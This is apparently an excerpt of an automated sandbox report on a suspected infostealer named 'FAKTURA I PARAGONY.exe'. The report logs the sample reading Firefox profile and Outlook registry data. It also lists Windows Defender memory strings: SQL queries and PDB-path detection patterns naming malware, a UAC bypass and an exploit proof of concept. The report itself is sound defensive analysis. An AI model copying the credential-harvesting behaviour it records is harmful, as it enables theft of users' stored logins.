    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;
    Source: MpSigStub.exe, 00000023.00000003.6227003671.0000028BC70EC000.00000004.00000001.sdmpBinary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;Engine.MetaStore.DBVaultUtilizationMpDisableTaskSchedCmdLineScanMb=Lk
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO AnomalyTables(Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(16, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(8, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(26, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_ FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT COUNT(1) FROM AnomalyTables;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
    Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmpBinary or memory string: SELECT COUNT(1) FROM FileHashes; DELETE FROM FileHashes WHERE FileHashes.Key = ?; DELETE FROM FileHashes WHERE InstanceTimeStamp < ?; INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);SELECT Key FROM FileHashes WHERE FileHashes.Key = ?; SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?; SELECT Key FROM FileHashes ORDER BY InstanceTimeStamp ASC LIMIT 1
    Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID, PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High FROM BmProcessInfo WHERE PPIDHash = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1;
    Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmpBinary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(20, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE PersistId = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(18, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID FROM BmProcessInfo WHERE PPIDHash = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT COUNT(1) FROM AnomalyInfo;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ValueMapArrayBlob FROM ValueMapArray WHERE Key = ? AND RecordType = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;
    Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmpBinary or memory string: SELECT Key FROM AttributeCounts WHERE AttributeCounts.Key = ?;
    Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmpBinary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT Count(1) FROM DynSigRevisions;SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Key FROM AttributeCounts ORDER BY InsertTime ASC LIMIT 1;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Key FROM ValueMapArray WHERE ValueMapArray.Key = ? AND ValueMapArray.RecordType = ?;
    Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmpBinary or memory string: SELECT COUNT(1) FROM AtomicCounters; SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1; SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?; DELETE FROM AtomicCounters; DELETE FROM AtomicCounters WHERE ExpireTime < ?; DELETE FROM AtomicCounters WHERE AtomicCounters.Key = ?; SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?; UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(21, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmpBinary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT Count(1) FROM BmFileInfo;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT COUNT(1) FROM AtomicCounters;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(17, 1, date('now'));
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO BmHipsRuleInfo(ProcessInfoId, RuleAction, RuleId, IsAudit, IsInherited, State) VALUES (?, ?, ?, ?, ?, ?);
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
    Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmpBinary or memory string: SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory;SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? 
ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;[3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8996:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3892:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8996:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3892:304:WilStaging_02
    Source: FAKTURA I PARAGONY.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
    Source: FAKTURA I PARAGONY.exe | Virustotal: Detection: 44%
    Source: FAKTURA I PARAGONY.exe | ReversingLabs: Detection: 26%
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe | File created: C:\Users\user\AppData\Local\Temp\~DF873EF0223084BD52.TMP
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Source: Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
    Source: Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
    Source: Binary string: 6\Desktop\EK\Source\Rina_AC\Rina_AC\Release\Rina_AC.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
    Source: Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
    Source: Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
    Source: Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
    Source: Binary string: Bou3asba\obj\Release\Danao.pdb source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp
    Source: Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp
    Source: Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
    Source: Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
    Source: Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp
    Source: Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
    Source: Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
    Source: Binary string: 2Projects\VerifyAndLaunch\release\GCO Bootstrap.pdb source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmp
    Source: Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
    Source: Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
    Source: Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
    Source: Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
    Source: Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
    Source: Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp
    Source: Binary string: winlogon.PDB source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
    Source: Binary string: \RUNPCH\Release\GUO_CAU.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
    Source: Binary string: 0.pdb source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp
    Source: Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
    Source: Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp
    Source: Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp
    Source: Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp
    Source: Binary string: advapi32.pdbx source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
    Source: Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
    Source: Binary string: )\CVE-2019-0803201992\Release\poc_test.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
    Source: Binary string: cleanmgr.pdbPE source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp
    Source: Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp
    Source: Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
    Source: Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
    Source: Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
    Source: Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
    Source: Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
    Source: Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
    Source: Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
    Source: Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
    Source: Binary string: S\ccnet\Publish_Client\work\src\mainapp\Abacus.LaunchMail\bin\Release\LaunchMail.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdbP& source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp
    Source: Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
    Source: Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp
    Source: Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
    Source: Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp
    Source: Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp
    Source: Binary string: joy.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
    Source: Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp
    Source: Binary string: msimg32.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
    Source: Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp
    Source: Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp
    Source: Binary string: *.pdb.|!%WINDIR%\Microsoft.NET\mscorsvw.exe source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp
    Source: Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp
    Source: Binary string: Release\NtdsAudit.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: netsh.pdbj source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
    Source: Binary string: mshta.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
    Source: Binary string: D:\developement\projects\flood_load\Release\flood_load.pdb source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp
    Source: Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000023.00000003.6310854687.0000028BD61A4000.00000004.00000001.sdmp
    Source: Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
    Source: Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
    Source: Binary string: ddraw.pdb source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp
    Source: Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp
    Source: Binary string: wbadmin.pdb source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp
    Source: Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp
    Source: Binary string: Unite.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
    Source: Binary string: \Release\WCmouiTri.pdb] source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp
